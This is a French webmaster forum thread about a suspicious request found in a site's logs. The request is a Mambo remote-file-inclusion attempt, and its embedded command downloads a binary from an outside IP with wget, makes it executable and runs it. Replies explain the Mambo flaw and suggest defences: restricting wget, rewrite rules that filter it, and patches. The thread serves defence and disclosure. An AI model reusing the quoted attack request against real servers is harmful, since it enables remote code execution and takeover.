Aller au contenu

Sujets conseillés

Posté (modifié)

Bonjour,

En regardant les stats d'un de mes sites, j'ai vu plusieurs accès direct via ce code :

http://xxx.xxx.xxx.xxx/index.php?
option=com_content&do_pdf=1&id=1index2.php?
_REQUEST[option]=com_content&_REQUEST[Itemid]=
1&GLOBALS=&mosConfig_absolute_path=
http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;
wget%20219.84.105.36/supina;chmod%20744%20supina;./sup

NB : j'ai scindé la requête pour qu'elle puisse rentrée dans le post, mais il s'agit bien d'une seule et unique ligne...

L'adresse IP du site en question a été remplacé par des xxx : il s'agit du site de mon entreprise.

La seconde IP m'est inconnu...

Quand on colle cette ligne dans la barre d'adresse du navigateur, on tombe directement sur le site de mon entreprise...

Quelqu'un peut-il m'expliquer à quoi corresponds cette entrée bizarre (code après le index.php) ?

Merci

Modifié par gatcweb
Posté (modifié)

Il s'agit à mon avis d'une tentative de hack.

Trouve l'ip dans tes logs et regarde d'où ça vient.

//EDIT : D'après l'ip "219.84.105.36" que tu as dans tes stats ça viendrait de Taiwan...

Modifié par Théo B.
Posté
Il s'agit à mon avis d'une tentative de hack.

Trouve l'ip dans tes logs et regarde d'où ça vient.

Je pense aussi.

Je viens de faire une requête sur GG : com_content&do_pdf et j'ai bien l'impression qu'il s'agit de spam...

A votre avis...

Posté

Le plus inquiétant est l'appel de wget... il télécharge un programme en provenance de son serveur et tente de l'exécuter chez toi.

Ce n'est vraisemblablement pas du spam mais une tentative d'intrusion, comme le montre cette partie de l'URL:

&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./sup

à laquelle il doit manquer la fin ...

Si tu es sur un serveur dédié, le plus simple est de supprimer le droit d'exécution de wget à l'utilisateur Apache (nobody)

Ou encore de lancer une commande "chmod 700 /usr/bin/wget"

Dan

Posté
Le plus inquiétant est l'appel de wget... il télécharge un programme en provenance de son serveur et tente de l'exécuter chez toi.

Ce n'est vraisemblablement pas du spam mais une tentative d'intrusion.

Si tu es sur un serveur dédié, le plus simple est de supprimer le droit d'exécution de wget à l'utilisateur Apache (nobody)

Ou encore de lancer une commande "chmod 700 /usr/bin/wget"

Merci DAN,

Je vois cela avec le responsable "réseau" et mon hébergeur...

La 1ère attaque est venu, a priori, de 213.196.223.21.

Selon dnsstuff.com : http://www.dnsstuff.com/tools/ip4r.ch?ip=213.196.223.21 ... cela correspondrait à mail.compecon.de

Posté

Une attaque venant d'un serveur de mail ? je ne pense pas... tu as dû te louper dans l'analyse du log.

Une simple règle de réécriture et tu te débarrasses de toutes les URLs qui contiennent wget dans la QUERY_STRING ;)

Mais il ne faut pas que tu utilises toi-même "wget" dans tes noms ou valeurs de variables...

Au moins tu éviteras 95% des tentatives de hack :)

Dan

Posté
Une attaque venant d'un serveur de mail ? je ne pense pas... tu as dû te louper dans l'analyse du log.

Ok, je vais revirifier...

Une simple règle de réécriture et tu te débarrasses de toutes les URLs qui contiennent wget dans la QUERY_STRING ;)

Mais il ne faut pas que tu utilises toi-même "wget" dans tes noms ou valeurs de variables...

Au moins tu éviteras 95% des tentatives de hack :)

Nous n'utilisons pas WGET sur le site...

Responsable réseau et hébergeur => contactés...

Merci DAN... toujours aussi prompt et perspicace...

Posté

Bonjour,

Vous m'inquiétez... :blink: Le risque dont vous parlez est seulement présent si /index.php ne traite pas ces variables avec toute la prudence nécessaire ou je me trompe ?

Jean-Luc

Posté

Il ne faut pas permettre à un script d'appeler wget, c'est le plus simple.

L'exemple plus haut fait vraisemblablement appel à une faille d'un fichier index.php, comme on en trouve souvent dans le forum phpBB.

Donc le hacker lance cette ligne de commande (les arguments) en espérant qu'elle soit prise en compte.

Mais normalement, un fichier index.php non buggé ne les prendra pas. Donc, pas de risque. :)

Dan

Posté

Bonjour a tous,

ça y est Régis, me voilà :rolleyes:

Pour completer le post ....j'ai analyser la requête et fait quelques recherche...

"mosConfig_absolute_path" est une variable de Mambo; jusqu'a la version 4.5.2.3 de mambo il y a une faille de sécurité (il existe un patch pour la corriger):

Une vulnérabilité a été identifiée dans Mambo, elle pourrait être exploitée par un attaquant distant afin de compromettre un serveur web vulnérable. Le problème résulte d'une erreur présente au niveau de l'émulation "register_globals" dans "globals.php", ce qui pourrait être exploité afin d'inclure un fichier malicieux via la variable "mosConfig_absolute_path" et exécuter des commandes arbitraires avec les privilèges du serveur web.

Source ici

Je ne pense pas que le site soit visé directement (On n'utilise pas Mambo); je dirais plûtot qu'on cherche a utiliser une machine ou mambo est installé pour faire une attaque par rebond sur une autre cible....à vérifier...

Bonne journée à tous

Posté (modifié)
On n'utilise pas Mambo

OK merci à toi pour ces infos Baboon... cela est rassurant

A toute fin utile pour les utilisateurs de Mambo : sur l'URL que tu as donné => il y a un lien vers un correctif

Modifié par gatcweb
Posté (modifié)
Il ne faut pas permettre à un script d'appeler wget, c'est le plus simple.

L'exemple plus haut fait vraisemblablement appel à une faille d'un fichier index.php, comme on en trouve souvent dans le forum phpBB.

Donc le hacker lance cette ligne de commande (les arguments) en espérant qu'elle soit prise en compte.

Mais normalement, un fichier index.php non buggé ne les prendra pas. Donc, pas de risque. :)

Dan

<{POST_SNAPBACK}>

C'etait une faille de php en fait si je me souviens bien.

Le ver qui l'utilisait etait santy (et s'etait specialisé entre autres sur phpbb mais beaucoup d'autres scripts étaient concernés). Il y a pas mal d'exemple de htaccess pour virer ce ver.

Il avait essayé de venir sur mon phpbb mais excepté la conso de bande passante, il n'avait rien pu faire.

François

Modifié par suede

Veuillez vous connecter pour commenter

Vous pourrez laisser un commentaire après vous êtes connecté.



Connectez-vous maintenant
×
×
  • Créer...